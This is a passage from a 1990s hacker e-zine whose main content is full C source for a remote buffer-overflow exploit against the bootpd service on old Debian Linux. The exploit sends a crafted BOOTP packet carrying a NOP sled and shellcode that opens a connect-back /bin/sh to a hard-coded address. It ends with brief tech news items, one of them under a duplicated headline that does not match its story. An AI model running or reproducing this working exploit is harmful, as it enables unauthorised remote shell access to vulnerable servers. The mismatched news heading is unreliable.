#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include "bootp.h"
#define MAX_MSG_SIZE 500
char shellcode[] =
"\x31" "\xc9" "\x89" "\xc8" "\x04" "\x66" "\x41" "\x89" "\xca" "\x89" "\xcb"
"\xeb" "\x7f" "\x5f" "\x89" "\x4f" "\x08" "\x41" "\x89" "\x4f" "\x04" "\x80"
"\xc1" "\x04" "\x89" "\x4f" "\x0c" "\x8d" "\x4f" "\x04" "\xcd" "\x80" "\x89"
"\x07" "\x31" "\xc9" "\x80" "\xc1" "\x02" "\x66" "\x89" "\x4f" "\x0c" "\x66"
"\x89" "\x4f" "\x0e" "\x80" "\xc1" "\x0e" "\x66" "\x89" "\x4f" "\x08" "\x66"
"\xb9" "\x30" "\x39" "\x66" "\x89" "\x4f" "\x0e" "\x8d" "\x47" "\x0c" "\x89"
"\x47" "\x04" "\x31" "\xc9" "\xb1" "\x03" "\x89" "\xca" "\x89" "\xcb" "\x89"
"\xf9" "\x31" "\xc0" "\x04" "\x66" "\xcd" "\x80" "\x31" "\xc0" "\x89" "\xc1"
"\x04" "\x3f" "\x89" "\xc2" "\x8b" "\x1f" "\xcd" "\x80" "\x89" "\xd0" "\x41"
"\xcd" "\x80" "\x89" "\xd0" "\x41" "\xcd" "\x80" "\x31" "\xc0" "\x89" "\x47"
"\x10" "\x88" "\x47" "\x1b" "\x8d" "\x47" "\x14" "\x89" "\x47" "\x0c" "\x31"
"\xc0" "\x04" "\x0b" "\x8d" "\x5f" "\x14" "\x8d" "\x4f" "\x0c" "\x8d" "\x57"
"\x10" "\xcd" "\x80" "\x31" "\xc0" "\x40" "\xcd" "\x80" "\xe8" "\x7c" "\xff"
"\xff" "\xff" "\x2e" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41" "\x41"
"\x41" "\x41" "\x41" "\x41" "\x41" "\x39" "\x30" "\xc0" "\xa8" "\x01" "\x01"
"\x2f" "\x62" "\x69" "\x6e" "\x2f" "\x73" "\x68" "\x00";
#define SERVER_PORT 67
char client_addr[16] = "127.000.000.001";
char host_addr[16] = "207.053.133.005";
int realpath_adjust = 0;
int exploit_length = 1200;
struct sockaddr_in server_addr;
void sendpacket(int, struct bootp *);
void build_packet(struct bootp *, int, char**);
void get_args(int, char**);
void usage(void);
int main(int argc, char *argv[])
{
struct bootp* bp;
int s;
get_args(argc, argv);
server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(SERVER_PORT);
server_addr.sin_addr.s_addr = inet_addr(host_addr);
if ((s = socket(AF_INET, SOCK_DGRAM, 0)) < 0) {
fprintf(stderr, "cannot create socket\n");
exit(1);
}
if ((bp = (struct bootp*) malloc(MAX_MSG_SIZE + 1000)) == NULL) {
(void) fprintf(stderr, "Cannot malloc.\n");
exit(1);
};
(void) memset(bp, 0, MAX_MSG_SIZE + 1000); /* ai exploit isn't secure */
build_packet(bp, argc, argv);
sendpacket(s, bp);
}
void sendpacket(int s, struct bootp *bp)
{
if (sendto(s, (const void *) bp, MAX_MSG_SIZE, 0,
(const struct sockaddr *) &server_addr,
sizeof(struct sockaddr_in)) == -1) {
fprintf(stderr, "sendpacket: sendto returned -1 ;(\n");
exit(1);
}
}
void build_packet(struct bootp *bp, int argc, char *argv[])
{
unsigned long start_realpath = 0xbffff684 + realpath_adjust;
unsigned long addr_ret_addr = start_realpath + 8 + 0x488;
unsigned long temp_addr, temp_addr2 = 0;
int length_tftpdir = 1; // no ftpdir just a slash at the start..
int num_nops = 600;
char *p;
unsigned long *q;
int i;
bp->bp_op = BOOTREQUEST;
bp->bp_xid = 58524;
bp->bp_htype = HTYPE_ETHERNET;
bp->bp_hlen = 6;
bp->bp_ciaddr.s_addr = inet_addr(client_addr);
printf("Using: client: %s\n", client_addr);
printf("Using: server: %s\n", host_addr);
printf("Addr of realpath: %x\n", start_realpath);
p = bp->bp_file;
/* Putting in nops */
for (i = 0; i < num_nops; i++)
*p++ = 0x90;
printf("Added: %d nops\n", num_nops);
/* Putting in shellcode */
for(i = 0; i < strlen(shellcode); i++)
*p++ = shellcode[i];
printf("%d bytes of shellcode added.\n", strlen(shellcode));
/* Aligning to make sure the ret_addr is placed correctly */
temp_addr = p - bp->bp_file + length_tftpdir + start_realpath;
for(i = 0; i < (addr_ret_addr - temp_addr) % 4; i++)
*p++ = 'a';
printf("%d bytes of alignment added.\n", (addr_ret_addr - temp_addr) %4);
/* set return adress.. hopefully in exploit code.... */
temp_addr2 = start_realpath + length_tftpdir + (num_nops / 2);
if (!(temp_addr2 & 0xff)) temp_addr2++;
printf("Setting return addr to: %x \n", temp_addr2);
q = (unsigned long *) p;
do {
*q++ = temp_addr2;
p = (char *) q;
} while ((p - bp->bp_file) < exploit_length);
*p++ = '\0';
printf("Exploit length: %d \n", strlen(bp->bp_file));
}
void get_args(int argc, char *argv[])
{
int ch;
while ((ch = getopt(argc, argv, "c:s:a:e:")) != EOF) {
switch(ch) {
case 'c':
strcpy(client_addr, optarg);
break;
case 's':
strcpy(host_addr, optarg);
break;
case 'a':
realpath_adjust = atoi(optarg);
break;
case 'e':
exploit_length = atoi(optarg);
break;
default:
usage();
}
}
}
void usage(void)
{
printf("bootpd exploit against debian linux 1.3 and 2.0 (probably others)\n");
printf("\nBy Willem Pinckaers (W.H.J.Pinckaers@cpedu.rug.nl) 1998\n");
printf("\nUsage:\n\tbootpd: -c client_addr -s server_addr -a offset\n");
exit(1);
}
Files Compiled with the zip version of Keen Veracity Issue Six:
o bootpd.h
o bootpd.c
o bptypes.h
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
In the news sources
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
__________________________________________
OpenPGP Wins IETF Proposed Standard Status
__________________________________________
OpenPGP, the open standards version of Network
Associates Inc.'s PGP (Pretty Good Privacy) encryption
technology, has received a promotion. According to a
statement issued by network Associates, OpenPGP has been
promoted to "Proposed Standard" status by the Internet Engineering
Tak Force. With this promption, Network Associates also
granted full change control over OpenPGP protocols.
__________________________________________
VLSI Licenses RSA Technology for Networking
Security Chip
-------------------------------------------
RSA Data Security Inc. of San Mateo, CA, announced
that VLSI Tecnology Inc., a San Jose CA, maker of
system-on-a-chip custom ICs, has incorporated RSA's
security technology into a new Internet Protocol
Security (IPSEC) coprocessor chip. The VLSI chip
will be used in networking hardwrae for Internet
commerce applications, says RSA. Key commercial
applications for VLSI security chips include electronic
commerce, cable modems, satellite data transmission,
voice and data communications and consumer video.
__________________________________________
IDSL NIC Goes Interoperable with Cisco 901
Multiplexer
-------------------------------------------
Xpeed Inc., a Santa Clara, CA, supplier
of high-performance low cost connectivity devices
for digital subscriber line (DLS) connections,
announced that its Model 200 IDSL network adapter
has been tested and certified by Cisco Systems as
interoperable with Cisco's 90i central office system.
The PCI adaptor, which is scheduled to ship later this month,
was tested and certified by Cisco's Laboratories as fully
compatible with it's 90i Channel Unit for d4 chennel bank
frame multiplexers.
__________________________________________
IDSL NIC Goes Interoperable with Cisco 901
Multiplexer
-------------------------------------------
DNA evidence is now a prominent part of criminal trials.
Researchers at the IBM Wat-son Research Laboratory think
they can apply the lessons of forensic science to the hunt
for computer hackers. They have developed a computer algorithm
to learn about strands of DNA. Giving it the name "Teiresias,"
for a blind seer in Greek folklore, it has been put to work
on spotting patterns that could catch hackers at work.
Modern computers are fast enough to detect the patterns
hackers are using to brek into a network (Wired)
-------------------------------------------
*--------------------------------------------------*
| Legions of the Underground |
| www.legions.org |
| Submissions = digi@wintermute.linux.tc |
| Distro Information = webmaster@legions.org |
*--------------------------------------------------*
---------------------------------------------------------------------------
This has been a Legions of the Underground Production
---------------------------------------------------------------------------
